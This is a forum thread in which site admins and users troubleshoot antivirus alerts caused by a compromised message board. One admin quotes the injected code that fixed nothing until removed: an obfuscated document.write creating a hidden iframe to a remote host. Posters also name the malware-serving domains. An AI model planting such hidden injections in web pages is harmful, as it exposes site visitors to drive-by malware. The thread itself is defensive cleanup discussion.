ddcarnage said:Ok I'm not sure if this is going to help you guys but I've solved my problem. I had been hacked because of a vulnerability in a third party php script I was using some time ago.
I seems that when my system was comprimised, the hackers modified a very important php file in my message board system to print the following :
Code:document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");
Removing that solved the virus problem.
Cheers and good luck.
ddcarnage said:Hello,
I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.
Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.
I'll post more info here if ever I find any...
Frank
Kurt_Nelson said:ddcarnage said:Hello,
I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.
Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.
I'll post more info here if ever I find any...
Frank
Just stumbled on this thread...
I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?
My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.
chase33 said:Whatever the problem is they need to fix it. I too receive a notification that my computer blocked a hack attempt each time I log into the sight. This thread has been opened almost a month now. What are they doing.
Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run Mcafee at work and AVG at home. Both reported as giving the error.
Fishyfanatic said:...If I have 40 AA e-mails the Trojan will only appear on the first e-mail that I click from. It doesn't matter what banner is at the top of the page or who has responded to the post.